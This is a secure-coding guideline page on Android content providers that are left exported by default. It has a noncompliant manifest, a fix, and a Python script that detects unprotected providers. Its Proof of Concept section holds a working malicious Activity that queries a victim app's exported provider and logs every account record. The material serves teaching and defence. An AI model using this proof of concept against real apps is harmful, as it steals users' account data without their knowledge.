
The ContentProvider class provides a mechanism for managing data and sharing it with other applications. When a provider's data is shared with other apps, access control must be implemented carefully so that unauthorized apps cannot read or modify your sensitive data.

A content provider can be given one of three access levels:

  • Public
  • Private
  • Restricted access

...

The following entry in AndroidManifest.xml does not set the android:exported attribute. When either android:minSdkVersion or android:targetSdkVersion is 16 or lower, the attribute defaults to true, so the content provider is public and any app on the device can query it:

AndroidManifest.xml

<provider android:name=".content.AccountProvider" android:authorities="jp.co.vulnerable.accountprovider" />

Proof of Concept

...

The following code shows how this could be exploited: 

import android.app.Activity;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager.NameNotFoundException;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

// A malicious app that reads the victim's accounts. The class and method
// names are illustrative; the query itself is the attack.
public class AccountDumpActivity extends Activity {
  private static final String TAG = "AccountDumpActivity";

  @Override
  protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    dumpAccounts();
  }

  private void dumpAccounts() {
    // Check whether the vulnerable app (jp.co.vulnerable) is installed.
    try {
      ApplicationInfo info =
          getPackageManager().getApplicationInfo("jp.co.vulnerable", 0);
    } catch (NameNotFoundException e) {
      Log.w(TAG, "the app is not installed.");
      return;
    }
    // Extract account data through the exported content provider. No
    // permission is requested because the provider declares none.
    Uri uri = Uri.parse("content://jp.co.vulnerable.accountprovider");
    Cursor cur = getContentResolver().query(uri, null, null, null, null);
    if (cur != null) {
      try {
        int ri = 0;
        while (cur.moveToNext()) {
          ++ri;
          Log.i(TAG, String.format("row[%d]:", ri));
          for (int i = 0; i < cur.getColumnCount(); ++i) {
            String column = cur.getColumnName(i);
            String value = cur.getString(i);
            if (value != null) {
              // Keep each value on one log line.
              value = value.replaceAll("[\r\n]", "");
            }
            Log.i(TAG, String.format("\t%s:\t%s", column, value));
          }
        }
      } finally {
        cur.close();
      }
    } else {
      Log.i(TAG, "Can't get the app information.");
    }
  }
}

Compliant Solution

The following entry in the AndroidManifest.xml file sets android:exported="false", which makes the content provider private so that other apps cannot access its data. Set the attribute explicitly even when minSdkVersion and targetSdkVersion are 17 or higher, where the default is already false, so the intent is visible in the manifest and does not depend on the SDK settings:

<provider android:name=".content.AccountProvider" android:exported="false" android:authorities="jp.co.vulnerable.accountprovider" />

Risk Assessment

Declaring a content provider public, or leaving it exported by default without a permission, can leak sensitive information to malicious apps.

Rule      Severity  Likelihood  Remediation Cost  Priority  Level
DRD01-J   high      probable    low               P18       L1

Automated Detection

It is trivial to automatically detect when a content provider is declared public: the manifest either sets android:exported="true" or omits the attribute while minSdkVersion or targetSdkVersion is 16 or lower, and the provider carries no android:permission, android:readPermission or android:writePermission.
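The following Python script is an added example of such a check and is not tooling from the CERT rule or the JSSEC guidebook. It parses a manifest, applies the exported-by-default rule for API Level 16 and lower, and reports providers reachable by any app. The sample manifests are constructed here; they include the noncompliant and compliant entries from this rule plus a "Restricted access" variant guarded by a signature-level permission whose name, jp.co.vulnerable.permission.READ_ACCOUNTS, is an assumption.

```python
"""Static check for DRD01-J: flag content providers that are exported
(explicitly, or by default) and not protected by any permission.
Added example; the sample manifests below are constructed, not taken
from the original page."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _exported_by_default(root):
    """A <provider> without android:exported is exported when either
    minSdkVersion or targetSdkVersion is 16 or lower. A missing
    <uses-sdk> means minSdkVersion 1, so the provider is exported;
    an absent targetSdkVersion defaults to minSdkVersion."""
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is None:
        return True
    min_sdk = int(_attr(uses_sdk, "minSdkVersion") or 1)
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or min_sdk)
    return min_sdk <= 16 or target_sdk <= 16


def find_public_providers(manifest_xml):
    """Return the android:name of every provider reachable by any app:
    exported and carrying no permission, readPermission or
    writePermission. <path-permission> children are deliberately not
    credited, since they cover only the paths they name; such
    providers are still reported for manual review."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for provider in root.iter("provider"):
        exported = _attr(provider, "exported")
        if exported is None:
            is_exported = _exported_by_default(root)
        else:
            is_exported = exported.strip().lower() == "true"
        protected = any(
            _attr(provider, p)
            for p in ("permission", "readPermission", "writePermission"))
        if is_exported and not protected:
            findings.append(_attr(provider, "name"))
    return findings


def build_manifest(uses_sdk, provider_attrs, extra=""):
    """Constructed sample manifest around the rule's AccountProvider."""
    return (
        '<manifest xmlns:android="http://schemas.android.com/apk/res/android"'
        ' package="jp.co.vulnerable">\n' + uses_sdk + extra +
        '  <application>\n'
        '    <provider android:name=".content.AccountProvider"\n'
        '              android:authorities="jp.co.vulnerable.accountprovider"\n'
        '              ' + provider_attrs + ' />\n'
        '  </application>\n</manifest>\n')


SDK_8_16 = '  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16" />\n'
SDK_17_19 = '  <uses-sdk android:minSdkVersion="17" android:targetSdkVersion="19" />\n'
# Hypothetical in-house permission; only apps signed with the same key can hold it.
SIGNATURE_PERMISSION = (
    '  <permission android:name="jp.co.vulnerable.permission.READ_ACCOUNTS"\n'
    '              android:protectionLevel="signature" />\n')

SAMPLES = {
    "noncompliant_default_api16": build_manifest(SDK_8_16, ""),
    "compliant_exported_false": build_manifest(
        SDK_8_16, 'android:exported="false"'),
    "restricted_signature_permission": build_manifest(
        SDK_17_19,
        'android:exported="true" '
        'android:permission="jp.co.vulnerable.permission.READ_ACCOUNTS"',
        SIGNATURE_PERMISSION),
    "default_false_api17": build_manifest(SDK_17_19, ""),
    "no_uses_sdk": build_manifest("", ""),
}


def scan_samples():
    """Run the check over every constructed sample."""
    return {name: find_public_providers(xml) for name, xml in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print("%-32s %s" % (name, findings or "OK"))
```

Only the two manifests that rely on the pre-API-17 default are reported; the explicit android:exported="false" entry and the signature-permission entry pass, as does an unannotated provider in an app that targets API Level 17 or higher.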

Related Vulnerabilities

Related Guidelines

Android Secure Coding Guidebook by JSSEC

4.3. Creating/Using a Content Provider (2013/4/1 edition)
4.3.1.1. Creating/Using a private content provider
4.3.1.3. Creating/Using a partner-limited content provider (white listing)
4.3.1.4. Creating/Using a private content provider (signature permission)
4.3.1.5. Creating/Using a temporary content provider
4.3.2.1. Never create a content provider to be used only within the app for Android 2.2 (API Level 8) and before
4.3.2.2. Never publish a content provider which is intended to be used only within the application
4.3.2.4. Verify signature permission before use

Bibliography

Android Secure Coding Guidebook by JSSEC

4.3. Creating/Using a Content Provider (2013/4/1 edition)

